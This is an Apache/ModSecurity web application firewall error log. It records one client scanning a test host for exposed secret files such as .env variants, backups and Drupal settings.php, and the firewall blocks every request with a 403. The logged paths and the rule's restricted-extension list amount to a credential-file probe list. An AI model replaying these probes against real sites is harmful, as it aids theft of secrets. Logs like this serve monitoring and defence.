[Mon Jan 12 12:28:26.848325 2026] [:error] [pid 1355923] [client 13.40.27.204:43890] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aWTa2iE1xEBhFyXickXrdwAAAAA"]
[Mon Jan 12 12:28:26.941273 2026] [:error] [pid 1355926] [client 13.40.27.204:43926] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWTa2sC2y5bYy1r2HoPzDgAAAAM"]
[Mon Jan 12 12:28:26.941502 2026] [:error] [pid 1355926] [client 13.40.27.204:43926] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWTa2sC2y5bYy1r2HoPzDgAAAAM"]
[Mon Jan 12 12:28:26.941655 2026] [:error] [pid 1355926] [client 13.40.27.204:43926] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWTa2sC2y5bYy1r2HoPzDgAAAAM"]
[Mon Jan 12 12:28:27.033604 2026] [:error] [pid 1362233] [client 13.40.27.204:43958] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aWTa232DuVtAKraH1YONawAAAAk"]
[Mon Jan 12 12:28:27.033905 2026] [:error] [pid 1362233] [client 13.40.27.204:43958] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aWTa232DuVtAKraH1YONawAAAAk"]
[Mon Jan 12 12:28:27.034117 2026] [:error] [pid 1362233] [client 13.40.27.204:43958] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aWTa232DuVtAKraH1YONawAAAAk"]
[Mon Jan 12 12:28:27.919376 2026] [:error] [pid 1362233] [client 13.40.27.204:44278] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWTa232DuVtAKraH1YONbAAAAAk"]
[Mon Jan 12 12:28:27.919582 2026] [:error] [pid 1362233] [client 13.40.27.204:44278] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWTa232DuVtAKraH1YONbAAAAAk"]
[Mon Jan 12 12:28:27.919733 2026] [:error] [pid 1362233] [client 13.40.27.204:44278] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWTa232DuVtAKraH1YONbAAAAAk"]
[Mon Jan 12 12:28:28.014743 2026] [:error] [pid 1355925] [client 13.40.27.204:44314] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWTa3E7thAymmecRvtl0NAAAAAI"]
[Mon Jan 12 12:28:28.014939 2026] [:error] [pid 1355925] [client 13.40.27.204:44314] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWTa3E7thAymmecRvtl0NAAAAAI"]
[Mon Jan 12 12:28:28.015093 2026] [:error] [pid 1355925] [client 13.40.27.204:44314] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWTa3E7thAymmecRvtl0NAAAAAI"]
[Mon Jan 12 12:28:28.105458 2026] [:error] [pid 1355924] [client 13.40.27.204:44346] [client 13.40.27.204] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWTa3NIpinFXoPzDav5wWgAAAAE"]
[Mon Jan 12 12:28:28.105628 2026] [:error] [pid 1355924] [client 13.40.27.204:44346] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWTa3NIpinFXoPzDav5wWgAAAAE"]
[Mon Jan 12 12:28:28.105830 2026] [:error] [pid 1355924] [client 13.40.27.204:44346] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWTa3NIpinFXoPzDav5wWgAAAAE"]
[Mon Jan 12 12:28:28.105977 2026] [:error] [pid 1355924] [client 13.40.27.204:44346] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWTa3NIpinFXoPzDav5wWgAAAAE"]
[Mon Jan 12 12:28:28.195429 2026] [:error] [pid 1365300] [client 13.40.27.204:44376] [client 13.40.27.204] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWTa3NlKlmIJBGbQbR78SwAAAAs"]
[Mon Jan 12 12:28:28.195573 2026] [:error] [pid 1365300] [client 13.40.27.204:44376] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWTa3NlKlmIJBGbQbR78SwAAAAs"]
[Mon Jan 12 12:28:28.195745 2026] [:error] [pid 1365300] [client 13.40.27.204:44376] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWTa3NlKlmIJBGbQbR78SwAAAAs"]
[Mon Jan 12 12:28:28.195896 2026] [:error] [pid 1365300] [client 13.40.27.204:44376] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWTa3NlKlmIJBGbQbR78SwAAAAs"]
[Mon Jan 12 12:28:28.383164 2026] [authz_core:error] [pid 1362231] [client 13.40.27.204:44440] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/www
[Mon Jan 12 12:28:28.672123 2026] [:error] [pid 1355926] [client 13.40.27.204:44530] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aWTa3MC2y5bYy1r2HoPzEAAAAAM"]
[Mon Jan 12 12:28:28.672327 2026] [:error] [pid 1355926] [client 13.40.27.204:44530] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aWTa3MC2y5bYy1r2HoPzEAAAAAM"]
[Mon Jan 12 12:28:28.672478 2026] [:error] [pid 1355926] [client 13.40.27.204:44530] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aWTa3MC2y5bYy1r2HoPzEAAAAAM"]
[Mon Jan 12 12:28:28.776565 2026] [:error] [pid 1362233] [client 13.40.27.204:44562] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWTa3H2DuVtAKraH1YONbQAAAAk"]
[Mon Jan 12 12:28:28.776781 2026] [:error] [pid 1362233] [client 13.40.27.204:44562] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWTa3H2DuVtAKraH1YONbQAAAAk"]
[Mon Jan 12 12:28:28.776944 2026] [:error] [pid 1362233] [client 13.40.27.204:44562] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWTa3H2DuVtAKraH1YONbQAAAAk"]
[Mon Jan 12 12:28:28.878785 2026] [:error] [pid 1355925] [client 13.40.27.204:44598] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWTa3E7thAymmecRvtl0NQAAAAI"]
[Mon Jan 12 12:28:28.878973 2026] [:error] [pid 1355925] [client 13.40.27.204:44598] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWTa3E7thAymmecRvtl0NQAAAAI"]
[Mon Jan 12 12:28:28.879128 2026] [:error] [pid 1355925] [client 13.40.27.204:44598] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWTa3E7thAymmecRvtl0NQAAAAI"]
[Mon Jan 12 12:28:29.080387 2026] [:error] [pid 1365300] [client 13.40.27.204:44656] [client 13.40.27.204] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWTa3dlKlmIJBGbQbR78TAAAAAs"]
[Mon Jan 12 12:28:29.080566 2026] [:error] [pid 1365300] [client 13.40.27.204:44656] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWTa3dlKlmIJBGbQbR78TAAAAAs"]
[Mon Jan 12 12:28:29.080764 2026] [:error] [pid 1365300] [client 13.40.27.204:44656] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWTa3dlKlmIJBGbQbR78TAAAAAs"]
[Mon Jan 12 12:28:29.080948 2026] [:error] [pid 1365300] [client 13.40.27.204:44656] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWTa3dlKlmIJBGbQbR78TAAAAAs"]
[Mon Jan 12 12:28:29.182090 2026] [:error] [pid 1358564] [client 13.40.27.204:44678] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.1"] [unique_id "aWTa3R_UgGRJ4jDk47tQYQAAAAY"]
[Mon Jan 12 12:28:29.182297 2026] [:error] [pid 1358564] [client 13.40.27.204:44678] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.1"] [unique_id "aWTa3R_UgGRJ4jDk47tQYQAAAAY"]
[Mon Jan 12 12:28:29.182488 2026] [:error] [pid 1358564] [client 13.40.27.204:44678] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.1"] [unique_id "aWTa3R_UgGRJ4jDk47tQYQAAAAY"]
